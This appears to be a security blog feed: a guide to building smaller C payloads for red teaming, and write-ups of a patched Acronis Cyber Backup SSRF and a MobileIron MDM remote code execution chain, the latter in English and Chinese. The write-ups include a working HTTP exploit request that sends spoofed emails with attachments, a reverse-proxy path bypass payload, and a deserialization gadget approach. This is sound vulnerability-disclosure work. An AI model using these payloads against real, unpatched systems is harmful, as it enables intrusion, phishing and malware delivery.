
Smaller C Payloads on Windows

25 September 2020 at 15:20

Introduction

Many thanks to 0xPat for his post on malware development, which is where the inspiration for this post came from.

When writing payloads for use in penetration tests or red team engagements, smaller is generally better. No matter the language you use, there is always a certain amount of overhead required for running a binary, and in the case of C this is the C runtime library, or CRT. The C runtime is “a set of low-level routines used by a compiler to invoke some of the behaviors of a runtime environment, by inserting calls to the runtime library into compiled executable binary. The runtime environment implements the execution model, built-in functions, and other fundamental behaviors of a programming language”. On Windows, this means the various *crt.lib libraries that are linked against when you use C/C++. You might be familiar with the common compiler flags /MT and /MTd, which statically link the C runtime into the final binary. This is commonly done when you don’t want to rely on the versioned Visual C++ runtime that ships with the particular version of Visual Studio you happen to be using, as the target machine may not have that exact version; dynamic linking would mean shipping the Visual C++ Redistributable or somehow having the end user install it. Clearly that is not an ideal situation for pentesters and red teamers. Statically linking the C runtime into your payload works well and does not rely on preexisting redistributables, but it unfortunately increases the size of the binary.

How can we get around this?

Introducing msvcrt.dll

msvcrt.dll is a copy of the C runtime which is included in every version of Windows from Windows 95 on. It is present even on a fresh install of Windows that does not have any additional Visual C++ redistributables installed. This makes it an ideal candidate to use for our payload. The trick is how to reference it. 0xPat points to a StackOverflow answer that describes this process in rather general terms, but without some tinkering it is not immediately obvious how to get it working. This post is aimed at saving others some time figuring this part out (shout out to AsaurusRex!).

Creating msvcrt.lib

The idea is to find all the functions that msvcrt.dll exports and add them to a library file the linker can reference. The process is to dump the exports into a file with dumpbin.exe, parse the results into .def format, and then convert that into a library file with lib.exe. I have created a GitHub gist here that contains the commands to do this. I use Windows for dumping the exports and creating the .lib file, and Linux for the text processing that creates the .def file. I won’t go over the steps in detail here, as they are well commented in the gist.
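
For illustration, the parsing step can be sketched in Python. This is a hypothetical stand-in for the gist's Linux text processing, and it assumes dumpbin's standard export-table row format (ordinal, hint, RVA, name):

```python
import re

def exports_to_def(dumpbin_output: str, dll_name: str = "msvcrt.dll") -> str:
    """Turn `dumpbin /EXPORTS` output lines into a module-definition (.def) file.

    Export-table rows look roughly like:
        "         95   5E 0004F600 printf"
    (ordinal, hint, RVA, function name). Header and summary lines don't
    match the pattern and are skipped.
    """
    lines = ["LIBRARY " + dll_name, "EXPORTS"]
    row = re.compile(r"\s*\d+\s+[0-9A-Fa-f]+\s+[0-9A-Fa-f]{8}\s+(\S+)")
    for line in dumpbin_output.splitlines():
        m = row.match(line)
        if m:
            lines.append("    " + m.group(1))
    return "\n".join(lines) + "\n"
```

The resulting .def file can then be turned into an import library on Windows with something like `lib /DEF:msvcrt.def /OUT:msvcrt.lib /MACHINE:X64`; see the gist for the exact, tested commands.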

Some Caveats

It is important to note that using msvcrt.dll is not a perfect replacement for the full C runtime. It will provide you with the C standard library functions, but not the full set of features that the runtime normally provides. This includes things like initializing everything before calling the usual main function, handling command line arguments, and probably a lot of other stuff I have not yet run into. So depending on how many features of the runtime you use, this may or may not be a problem. C++ will likely have more issues than pure C, as many C++ features involving classes and constructors are handled by the runtime, especially during program initialization.

Using msvcrt.lib

Using msvcrt.lib is fairly straightforward, as long as you know the proper compiler and linker incantations. The first step is to define _NO_CRT_STDIO_INLINE at the top of your source files. This presumably disables the inlined CRT stdio functions, though I’ve not seen it explicitly documented by Microsoft anywhere. I have noticed that this definition alone is not enough; there are several compiler and linker flags that need to be set as well. I will list them here in the context of Visual Studio C/C++ project settings, along with the command line argument equivalents.

Visual Studio Project Settings

  • Linker settings:
    • Advanced -> Entrypoint -> something other than main/wmain/WinMain etc.
    • Input -> Ignore All Default Libraries -> YES
    • Input -> Additional Dependencies -> add the custom msvcrt.lib path, kernel32.lib, and any other libraries you may need, like ntdll.lib
  • Compiler settings:
    • Code Generation -> Runtime Library -> /MT
    • Code Generation -> /GS- (off)
    • Advanced -> Compile As -> /TC (only if you’re using C and not C++)
    • All Options -> Basic Runtime Checks -> Default

cl.exe Settings

cl.exe /MT /GS- /Tc myfile.c /link C:\path\to\msvcrt.lib "kernel32.lib" "ntdll.lib" /ENTRY:"YourEntrypointFunction" /NODEFAULTLIB

Some notes on these settings: you must have an entrypoint that is not named after one of the standard Windows C/C++ entry functions, like main or WinMain. Those are expected by the C runtime, and as the full C runtime is not included, they cannot be used. Likewise, runtime buffer overflow checks (/GS) and the other runtime checks are part of the C runtime and so are not available to us.

If you plan on using command line arguments, you can still do so, but you’ll need to use CommandLineToArgvW and link against Shell32.lib.

Conclusion

Using this method I’ve seen a size reduction of 8x-12x in the resulting binary. I hope this post can serve as helpful documentation for others trying to get this working. Feel free to contact me if you have any issues or questions, and especially if you have any improvements or better ways of accomplishing this.

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

14 September 2020 at 00:00

You have probably read one or more blog posts about SSRFs, many being escalated to RCE. While this might be the ultimate goal, this post is about an often overlooked impact of SSRFs: application logic impact.

This post will tell you the story about an unauthenticated SSRF affecting Acronis Cyber Backup up to v12.5 Build 16341, which allows sending fully customizable emails to any recipient by abusing a web service that is bound to localhost. The fun thing about this issue is that the emails can be sent as backup indicators, including fully customizable attachments. Imagine sending Acronis “Backup Failed” emails to the whole organization with a nice backdoor attached to it? Here you go.

Root Cause Analysis

Acronis Cyber Backup is a backup solution that offers administrators a powerful way to automatically back up connected systems such as clients and even servers. The solution itself consists of dozens of internally connected (web) services and functionalities, so it’s essentially a mess of different C/C++, Go, and Python applications and libraries.

The application’s main web service runs on port 9877 and presents you with a login screen.

Now, every hacker’s goal is to find something unauthenticated. Something cool. So I started to dig into the source code of the main web service, and it didn’t take me too long to discover exactly that in a method called make_request_to_ams:

# WebServer/wcs/web/temp_ams_proxy.py:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
[...]

The interesting thing here is the call to get_ams_address(request.headers), which is used to construct a URI. Within that method, the application reads out a specific request header called Shard:

def get_ams_address(headers):
    if 'Shard' in headers:
        logging.debug('Get_ams_address address from shard ams_host=%s', headers.get('Shard'))
        return headers.get('Shard')  # Mobile agent >= ABC5.0

When taking a further look at the make_request_to_ams call, things become pretty clear. The application uses the value from the Shard header in a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
[...]
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri,
                                 headers=headers,
                                 method=method,
                                 data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

So this is a pretty straightforward SSRF, including a couple of bonus points that make it even more powerful:

  • The instantiation of the urllib.request.Request class uses all original request headers, the HTTP method from the request, and even the whole request body.
  • The response is fully returned!

The only thing that needs to be bypassed is the hardcoded construction of the destination URI, since the API appends a colon, a port, and a resource to the requested host:

uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)

However, this is trivially easy to bypass, since you only need to append a ? to turn the appended parts into a query string. A final payload for the Shard header therefore looks like the following:

Shard: localhost?
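
To see why the trailing ? works, you can replay the server's format string locally. A quick sketch (the port comes from the default_ams_port config shown above; the resource and benign host values are assumptions for illustration):

```python
# The vulnerable code builds the URI like this:
#   uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
port = '9892'                 # default_ams_port
resource = '/api/ams/agents'  # the proxied route

# Benign Shard header: host and port land where intended.
benign = 'http://{}:{}{}'.format('ams-backend', port, resource)
print(benign)  # http://ams-backend:9892/api/ams/agents

# Malicious Shard header ending in '?': the appended ':9892/...' is
# demoted to a harmless query string, so the request actually hits the
# internal service at localhost:30572 instead.
evil = 'http://{}:{}{}'.format('localhost:30572/external_email?', port, resource)
print(evil)  # http://localhost:30572/external_email?:9892/api/ams/agents
```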

Finding Unauthenticated Routes

To exploit this SSRF we need to find a route which is reachable without authentication. While most of Cyber Backup’s routes are only reachable with authentication, there is one interesting route called /api/ams/agents which is kinda different:

# WebServer/wcs/web/temp_ams_proxy.py:
_AMS_ADD_DEVICES_ROUTES = [
    (['POST'], '/api/ams/agents'),
] + AMS_PUBLIC_ROUTES

Every request to this route is passed to the _route_add_devices_request_to_ams method:

def setup_ams_routes(app):
[...]
    for methods, uri, *dummy in _AMS_ADD_DEVICES_ROUTES:
        app.add_url_rule(uri,
                         methods=methods,
                         view_func=_route_add_devices_request_to_ams)
[...]

This in turn only checks whether the allow_add_devices configuration is enabled (which is the default config) before passing the request to the vulnerable _route_the_request_to_ams method:

def _route_add_devices_request_to_ams(*dummy_args, **dummy_kwargs):
    if not config.CONFIG.get('allow_add_devices', True):
        raise exceptions.operation_forbidden_error('Add devices')

    return _route_the_request_to_ams(*dummy_args, **dummy_kwargs)

So we’ve found our attackable route without authentication here.

Sending Fully Customized Emails Including An Attachment

Apart from doing metadata stuff or similar, I wanted to fire the SSRF directly against one of Cyber Backup’s internal web services. There are many of these, including a whole bunch of web services whose authorization concept relies solely on being callable from localhost. Sounds like a weak spot, right?

One interesting internal web service is listening on localhost port 30572: the Notification Service. This service offers a variety of functionality to send out notifications. One of the provided endpoints is /external_email/:

@route(r'^/external_email/?')
class ExternalEmailHandler(RESTHandler):
    @schematic_request(input=ExternalEmailValidator(), deserialize=True)
    async def post(self):
        try:
            error = await send_external_email(
                self.json['tenantId'], self.json['eventLevel'], self.json['template'], self.json['parameters'],
                self.json.get('images', {}), self.json.get('attachments', {}), self.json.get('mainRecipients', []),
                self.json.get('additionalRecipients', [])
            )
            if error:
                raise HTTPError(http.BAD_REQUEST, reason=error.replace('\n', ''))
        except RuntimeError as e:
            raise HTTPError(http.BAD_REQUEST, reason=str(e))

I’m not going through the send_external_email method in detail since it is rather complex, but this endpoint essentially uses parameters supplied via HTTP POST to construct an email that is sent out afterwards.

The final working exploit looks like the following:

POST /api/ams/agents HTTP/1.1
Host: 10.211.55.10:9877
Shard: localhost:30572/external_email?
Connection: close
Content-Length: 719
Content-Type: application/json;charset=UTF-8

{"tenantId":"00000000-0000-0000-0000-000000000000",
"template":"true_image_backup",
"parameters":{
"what_to_backup":"what_to_backup",
"duration":2,
"timezone":1,
"start_time":1,
"finish_time":1,
"backup_size":1,
"quota_servers":1,
"usage_vms":1,
"quota_vms":1,"subject_status":"subject_status",
"machine_name":"machine_name",
"plan_name":"plan_name",
"subject_hierarchy_name":"subject_hierarchy_name",
"subject_login":"subject_login",
"ams_machine_name":"ams_machine_name",
"machine_name":"machine_name",
"status":"status","support_url":"support_url"
},
"images":{"test":"./critical-alert.png"},
"attachments":{"test.html":"PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg=="},
"mainRecipients":["[email protected]"]}

This involves a variety of “customizations” for the email, including a base64-encoded attachments value. Issuing this POST request returns null, but it ultimately sends out the email to the given mainRecipients, including the attachments.

Perfectly spoofed mail, right ;-) ?

The Fix

Acronis fixed the vulnerability in version v12.5 Build 16342 of Acronis Cyber Backup by changing the way that get_ams_address gets the actual Shard address. It now requires an additional authorization header with a JWT that is passed to a method called resolve_shard_address:

# WebServer/wcs/web/temp_ams_proxy.py:
def get_ams_address(headers):
    if config.is_msp_environment():
        auth = headers.get('Authorization')
        _bearer_prefix = 'bearer '
        _bearer_prefix_len = len(_bearer_prefix)
        jwt = auth[_bearer_prefix_len:]
        tenant_id = headers.get('X-Apigw-Tenant-Id')
        logging.info('GET_AMS: tenant_id: {}, jwt: {}'.format(tenant_id, jwt))
        if tenant_id and jwt:
            return wcs.web.session.resolve_shard_address(jwt, tenant_id)

While neither tenant_id nor jwt is explicitly validated here, they are simply used in a new hardcoded call to the API endpoint /api/account_server/tenants/, which ultimately verifies the authorization:

# WebServer/wcs/web/session.py:
def resolve_shard_address(jwt, tenant_id):
    backup_account_server = config.CONFIG['default_backup_account_server']
    url = '{}/api/account_server/tenants/{}'.format(backup_account_server, tenant_id)

    headers = {
        'Authorization': 'Bearer {}'.format(jwt)
    }

    from wcs.web.proxy import make_request
    result = make_request(url,
                          logging.getLogger(),
                          method='GET',
                          headers=headers).json()
    kind = result['kind']
    if kind not in ['unit', 'customer']:
        raise exceptions.unsupported_tenant_kind(kind)
    return result['ams_shard']

Problem solved.

How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM

11 September 2020 at 16:00

Hi, it’s been a long time since my last article. This new post is about my research from this March, which covers how I found vulnerabilities in a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities were reported to the vendor and fixed in June. After that, we kept monitoring large corporations to track the overall patching progress, and found that Facebook didn’t keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported it to their Bug Bounty program!

This research was also presented at HITCON 2020. You can check the slides here!


As Red Teamers, we are always looking for new paths to infiltrate the corporate network from outside. Just like our research at Black Hat USA last year, in which we demonstrated how leading SSL VPNs could be hacked to become your Virtual “Public” Network! SSL VPN is trusted to be secure and considered the only way into your private network. But what if your trusted appliances are insecure?

Based on this scenario, we wanted to explore new attack surfaces in enterprise security. We got interested in MDM, and this article is the result!

What is MDM?

Mobile Device Management, also known as MDM, is an asset inventory system that makes employees’ BYOD devices more manageable for enterprises. It was proposed around 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that devices run under the corporate policy and in a trusted environment. Enterprises can manage assets, install certificates, deploy applications and even lock/wipe devices remotely to prevent data leakage.

UEM (Unified Endpoint Management) is a newer term related to MDM that uses a broader definition of managed devices. In the following, we use MDM to refer to this class of products!

Our target

MDM, as a centralized system, can manage and control all employees’ devices. It is undoubtedly an ideal asset inventory system for a growing company. Besides, MDM must be publicly reachable in order to synchronize devices all over the world. A centralized, publicly exposed appliance that manages employees’ devices: what could be more appealing to hackers?

Therefore, we have seen hackers and APT groups abusing MDM in recent years! For example, phishing victims into enrolling a malicious MDM as the C&C server for their mobile devices, or even compromising a corporation’s exposed MDM server to push malicious trojans to all devices. You can read the report Malicious MDM: Let’s Hide This App by the Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by the CheckPoint CPR team for more details!

From these previous cases, we know that MDM is a solid target for hackers, so we decided to research it. There are several MDM solutions on the market; even famous companies such as Microsoft, IBM and Apple have their own. Which one should we start with?

We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron!

So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers use it as well. We also know that Facebook has exposed a MobileIron server since 2016, when we published How I Hacked Facebook, and Found Someone’s Backdoor Script. We analyzed the Fortune Global 500 as well, and found more than 15% of them using and exposing their MobileIron servers to the public! For these reasons, it became our main target!

Where to Start

From past vulnerabilities, we learned that not many researchers have dived into MobileIron. Perhaps the attack vector is still unknown, but we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning pure black-box testing into gray-box or even white-box testing is vital. We spent lots of time searching for all kinds of information on the Internet, and ended up with an RPM package. This RPM file is supposed to be a developer’s testing package; it was just sitting on a listable web root, indexed by Google Search.

Anyway, we got a file to research. The file’s release date is early 2018. That seems a little bit old, but still better than nothing!

P.S. We have informed MobileIron, and the sensitive files have now been removed.

Finding Vulnerabilities

After a painful time solving the dependency hell, we finally got the testing package set up. The component is based on Java and exposes three ports:

  • 443 - the user enrollment interface
  • 8443 - the appliance management interface
  • 9997 - the MobileIron device synchronization protocol (MI Protocol)

All open ports are TLS-encrypted. Apache sits in front of the web part and proxies all connections to the backend, a Tomcat with Spring MVC inside.

Due to Spring MVC, it’s hard to find traditional vulnerabilities like SQL injection or XSS from a single view. Therefore, examining the logic and architecture was our goal this time!

Talking about the vulnerability, the root cause is straightforward: Tomcat exposes a Web Service that deserializes user input in the Hessian format. However, this doesn’t mean we can do everything! The main effort of this article is in solving what comes after, so please see the exploitation below.

Although we know the Web Service deserializes user input, we cannot trigger it yet. The endpoint is exposed on both:

  • User enrollment interface - https://mobileiron/mifs/services/
  • Management interface - https://mobileiron:8443/mics/services/

We can only reach the deserialization through the management interface, because the user interface blocks Web Service access. This was a critical hit for us: most enterprises won’t expose their management interface to the Internet, and a management-only vulnerability is not that useful, so we had to try harder. :(

Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right?

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

MobileIron relied on Apache Rewrite Rules to block all access to the Web Service. Apache is at the front of a reverse-proxy architecture, and the backend is a Java-based web server.

Have you recalled something?


Yes, Breaking Parser Logic! It’s the reverse-proxy attack surface I proposed in 2015 and presented at Black Hat USA 2018. This technique leverages the inconsistency between Apache and Tomcat to bypass the ACL control and re-access the Web Service. BTW, this excellent technique was also applied to the recent F5 BIG-IP TMUI RCE vulnerability (CVE-2020-5902)!

https://mobileiron/mifs/.;/services/someService
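
The parser inconsistency can be illustrated with a toy model of both sides. This is a deliberate simplification, not the servers' actual code: Apache matches its rewrite rules against the raw path, while Tomcat strips per-segment path parameters (anything after a ;) and then resolves the dot segment.

```python
import posixpath

def apache_blocks(path: str) -> bool:
    # Apache's RewriteRules anchor on "^/mifs/services"; the raw path
    # "/mifs/.;/services/..." does not start with that prefix,
    # so neither blocking rule fires.
    return path.startswith("/mifs/services")

def tomcat_resolves(path: str) -> str:
    # Tomcat treats ";..." in each segment as a path parameter and
    # drops it, then normalizes the leftover "." segment.
    stripped = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return posixpath.normpath(stripped)

payload = "/mifs/.;/services/someService"
print(apache_blocks(payload))    # False: the request passes the front end
print(tomcat_resolves(payload))  # /mifs/services/someService
```

So the same request string sails past Apache's ACL yet lands on the blocked Web Service once Tomcat maps it.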

Exploiting Vulnerabilities

OK, now we have access to the deserialization, whether through the enrollment interface or the management interface. Let’s go back to exploitation!

Moritz Bechler has done awesome research summarizing Hessian deserialization vulnerabilities in his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn that Hessian deserialization triggers equals() and hashCode() while reconstructing a HashMap. It can also trigger toString() through XString, and the known exploit gadgets so far are:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection.

  • Apache XBean - JNDI Injection (not available in our environment)
  • Caucho Resin - JNDI Injection (not available in our environment)
  • Spring AOP - JNDI Injection (available)
  • ROME EqualsBean - RCE (not available in our environment)

Once we have a JNDI Injection, the rest of the exploitation is easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh’s work from Black Hat USA 2016, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, to get code execution… Is that true?


Since Alvaro Muñoz and Oleksandr Mirosh introduced this technique at Black Hat, it has helped countless security researchers and brought Java deserialization vulnerabilities into a new era. However, Java finally mitigated the last piece of the JNDI/LDAP puzzle in October 2018 (CVE-2018-3149). Since then, no Java version higher than 8u181, 7u191, or 6u201 can get code execution through JNDI remote URL-class loading. Therefore, if we want to exploit the Hessian deserialization on the latest MobileIron, we must face this problem!

Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to false to prevent attackers from loading remote URL-classes to get code execution. But only that has been prohibited; we can still manipulate the JNDI and redirect the Naming Reference to a local Java class!

The concept is a little bit similar to Return-Oriented Programming: utilizing an existing local Java class for further exploitation. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin from early 2019 for details. It describes post-JNDI exploitation and how to abuse Tomcat’s BeanFactory to populate the ELProcessor gadget and get code execution. Based on this concept, the researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article:

Besides javax.el.ELProcessor, there are of course many other classes that meet the requirements and can be injected into the BeanFactory as the beanClass for exploitation. For example, if the Groovy library is in the target machine’s classpath, it can be combined with the Jenkins vulnerability that Orange published earlier.

It seems the Meta Programming exploitation from my previous Jenkins research could be used here as well. It makes Meta Programming great again :D


The approach is fantastic and looked feasible for us, but both the ELProcessor and ParseClass gadgets are unavailable due to our outdated target libraries. Tomcat introduced ELProcessor in 8.5, but our target runs 7. As for the Groovy gadget, the target’s Groovy version is too old (1.5.6, from 2008) to support Meta Programming, so we still had to find a new gadget by ourselves. In the end, we found a new gadget in GroovyShell. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project!

Attacking Facebook

Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It’s time to hack Facebook!

As mentioned before, we have known that Facebook uses MobileIron since 2016. Although the server’s index now responds with 403 Forbidden, the Web Service is still accessible!

Everything was ready and waiting for our exploit! However, several days before our scheduled attack, we realized there was a critical problem with it. From the last time we popped a shell on Facebook, we knew it blocks outbound connections due to security concerns. An outbound connection is vital for JNDI Injection, because the idea is to make the victim connect to a malicious server for further exploitation. But now we couldn’t even make an outbound connection, not to mention anything else.


So far, all attack surfaces for JNDI Injection had been closed, so we had no choice but to return to the Hessian deserialization itself. But due to the lack of available gadgets, we had to discover a new one by ourselves!


Before discovering a new gadget, we had to properly understand the root cause of the existing gadgets. After re-reading Moritz Bechler’s paper, one sentence caught my attention:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


A question quickly came to my mind: why did the author leave this note here? Although the gadget fails with an exception, there must have been something special about it for the author to write it down.

Our target is running a very old Groovy, so we guessed that the readResolve() constraint might not have been applied to that code base yet! We compared the file groovy/runtime/MethodClosure.java between the latest version and 1.5.6.

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

Yes, we were right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned that CVE-2015-3253 is exactly about that. It was a mitigation for the rising tide of Java deserialization vulnerabilities in 2015. Since Groovy is an internally used library, developers won’t update it if there is no emergency. The outdated Groovy is also a good case study demonstrating how a harmless-looking component can leave you compromised!

Of course we got the shell on Facebook in the end. Here is the video:

Vulnerability Report and Patch

We finished all the research in March and sent the advisory to MobileIron on 4/3. MobileIron released the patch on 6/15 and assigned three CVEs. You can check the official website for details!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

After the patch was released, we started monitoring the Internet to track the overall patching progress. Here we checked the Last-Modified header on static files, so the result is just for your information. (Unknown means the server closed both ports 443 and 8443.)


At the same time, we kept our attention on Facebook as well. After confirming no patch for 15 days, we finally popped a shell and reported it to their Bug Bounty program on 7/2!

Conclusion

So far, we have demonstrated a completely unauthenticated RCE on MobileIron: from how we got the firmware and found the vulnerability, to how we bypassed the JNDI mitigation and the network limitation. There are other stories, but due to time constraints, we just list the topics here for those who are interested:

  • How to take over the employees’ devices from MDM
  • Disassemble the MI Protocol
  • And the CVE-2020-15506, an interesting authentication bypass

I hope this article can draw attention to MDM and the importance of enterprise security! Thanks for reading. :D

看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!

11 September 2020 at 16:00

English Version 中文版本

嗨! 好久不見,這是我在今年年初的研究,講述如何尋找一款知名行動裝置管理產品的漏洞,並繞過層層保護取得遠端程式碼執行的故事! 其中的漏洞經回報後在六月由官方釋出修補程式並緊急通知他們的客戶,而我們也在修補程式釋出 15 天後發現 Facebook 並未及時更新,因此透過漏洞取得伺服器權限並回報給 Facebook!

此份研究同時發表於 HITCON 2020,你可以從這裡取得這次演講的投影片!


身為一個專業的紅隊,我們一直在尋找著更快速可以從外部進入企業內網的最佳途徑! 如同我們去年在 Black Hat USA 發表的研究,SSL VPN 理所當然會放在外部網路,成為保護著網路安全、使員工進入內部網路的基礎設施,而當你所信任、並且用來保護你安全的設備不再安全了,你該怎麼辦?

由此為發想,我們開始尋找著有沒有新的企業網路脆弱點可當成我們紅隊攻擊滲透企業的初始進入點,在調查的過程中我們對 MDM/UEM 開始產生了興趣,而這篇文章就是從此發展出來的研究成果!

什麼是 MDM/UEM ?

Mobile Device Management,簡稱 MDM,約是在 2012 年間,個人手機、平板裝置開始興起時,為了使企業更好的管理員工的 BYOD 裝置,應運而生的資產盤點系統,企業可以透過 MDM 產品,管理員工的行動裝置,確保裝置只在信任的環境、政策下運行,也可以從中心的端點伺服器,針對所控制的手機,部署應用程式、安裝憑證甚至遠端操控以管理企業資產,更可以在裝置遺失時,透過 MDM 遠端上鎖,或是抹除整台裝置資料達到企業隱私不外漏的目的!

UEM (Unified Endpoint Management) 則為近幾年來更新的一個術語,其核心皆為行動裝置的管理,只是 UEM 一詞包含更廣的裝置定義! 我們以下皆用 MDM 一詞來代指同類產品。

我們的目標

MDM 作為一個中心化的端點控制系統,可以控制、並管理旗下所有員工個人裝置! 對日益壯大的企業來說,絕對是一個最佳的資產盤點產品,相對的,對駭客來說也是! 而為了管理來自世界各地的員工裝置連線,MDM 又勢必得曝露在外網。 一個可以「管理員工裝置」又「放置在外網」的設備,這對我們的紅隊演練來說無疑是最棒的滲透管道!

另外,從這幾年的安全趨勢也不難發現 MDM 逐漸成為駭客、APT 組織的首選目標! 誘使受害者同意惡意的 MDM 成為你裝置的 C&C 伺服器,或是乾脆入侵企業放置在外網的 MDM 設備,在批次地派送行動裝置木馬感染所有企業員工手機、電腦,以達到進一步的攻擊! 這些都已成真,詳細的報告可參閱 Cisco Talos 團隊所發表的 Malicious MDM: Let’s Hide This App 以及 CheckPoint CPR 團隊所發表的 First seen in the wild - Malware uses Corporate MDM as attack vector!

從前面的幾個案例我們得知 MDM 對於企業安全來說,是一個很好的切入點,因此我們開始研究相關的攻擊面! 而市面上 MDM 廠商有非常多,各個大廠如 Microsoft、IBM 甚至 Apple 都有推出自己的 MDM 產品,我們要挑選哪個開始成為我們的研究對象呢?

因此我們透過公開情報列舉了市面上常見的 MDM 產品,並配合各家特徵對全世界進行了一次掃描,發現最多企業使用的 MDM 為 VMware AirWatch 與 MobileIron 這兩套產品! 至於要挑哪一家研究呢? 我們選擇了後者,除了考量到大部分的客戶都是使用 MobileIron 外,另外一個吸引我的點則是 Facebook 也是他們的客戶! 從我們在 2016 年發表的 How I Hacked Facebook, and Found Someone’s Backdoor Script 研究中,就已發現 Facebook 使用 MobileIron 作為他們的 MDM 解決方案!

根據 MobileIron 官方網站描述,至少有 20000+ 的企業使用 MobileIron 當成他們的 MDM 解決方案,而根據我們實際對全世界的掃描,也至少有 15% 以上的財富世界 500 大企業使用 MobileIron 且曝露在外網(實際上一定更多),因此,尋找 MobileIron 的漏洞也就變成我們的首要目標!

如何開始研究

過往出現過的漏洞可以得知 MobileIron 並沒有受到太多安全人員研究,其中原因除了 MDM 這個攻擊向量尚未廣為人知外,另一個可能是因為關於 MobileIron 的相關韌體太難取得,研究一款設備最大的問題是如何從純粹的黑箱,到可以分析的灰箱、甚至白箱! 由於無法從官網下載韌體,我們花費了好幾天嘗試著各種關鍵字在網路上尋找可利用的公開資訊,最後才在 Goolge Search 索引到的其中一個公開網站根目錄上發現疑似是開發商測試用的 RPM 包。

下載回的韌體為 2018 年初的版本,離現在也有很長一段時間,也許核心程式碼也大改過,不過總比什麼都沒有好,因此我們就從這份檔案開始研究起。

備註: 經通知 MobileIron 官方後,此開發商網站已關閉。

如何尋找漏洞

整個 MobileIron 使用 Java 作為主要開發語言,對外開放的連接埠為 443, 8443, 9997,各個連接埠對應功能如下:

  • 443 為使用者裝置註冊介面
  • 8443 為設備管理介面
  • 9997 為一個 MobileIron 私有的裝置同步協定 (MI Protocol)

三個連接埠皆透過 TLS 保護連線的安全性及完整性,網頁部分則是透過 Apache 的 Reverse Proxy 架構將連線導至後方,由 Tomcat 部署的網頁應用處理,網頁應用則由 Spring MVC 開發。

Because the technology stack is relatively modern, classic single-point vulnerabilities such as SQL injection are hard to find, so understanding the application logic and combining it with architecture-level attacks became our main strategy for this hunt!

The vulnerability itself is simple: the Web Service layer parses data in the Hessian format, which introduces a deserialization flaw! The bug can be explained in a single sentence, but those who know, know: deserialization does not mean you can do whatever you want. The exploitation that follows is the exciting part!

So we now know that MobileIron has a Hessian deserialization vulnerability in its Web Service handling! But a vulnerability existing does not mean we can reach it. The paths that can trigger the Hessian deserialization are:

  • User interface - https://mobileiron/mifs/services/
  • Management interface - https://mobileiron:8443/mifs/services/

The management interface has essentially no restrictions, so its Web Service is easy to reach; the user interface's Web Service, however, cannot be accessed. That was a critical blow for us: most enterprise network architectures do not expose the management port to the external network, so an attack that only works against the management interface is of limited use. We had to find another way to trigger the vulnerability!

Looking closely at how MobileIron blocks access, we found that it uses Rewrite Rules in Apache to deny access to the user interface's Web Service:

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

Nice! A reverse-proxy architecture, with the blocking done in the front layer. Does that remind you of anything?


Exactly! It is the new attack surface against reverse-proxy architectures that we discovered in 2015 and presented at Black Hat USA 2018: Breaking Parser Logic! This excellent technique was also recently put to great use in CVE-2020-5902, the remote code execution in F5 BIG-IP TMUI!

Exploiting the inconsistency between how Apache and Tomcat interpret paths, we can bypass the Rewrite Rules and reach the Web Service once again!

https://mobileiron/mifs/.;/services/someService

Boom! Now, whether through the management interface on 8443 or the user interface on 443, we can reach the Web Service where the Hessian deserialization lives!
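The parser mismatch can be modeled in a few lines of Python. This is a deliberately simplified sketch of the two behaviors, not the servers' actual code: Apache's rewrite rules match the raw request path, while Tomcat strips `;`-delimited path parameters per segment and then resolves `.` and `..`, so `/.;/` collapses away.

```python
import re

# Simplified regex parts of the blocking rules quoted above; mod_rewrite
# matches them against the raw, unnormalized request path.
block_rules = [r"^/mifs/services/(.*)$", r"^/mifs/services"]

def apache_blocks(path: str) -> bool:
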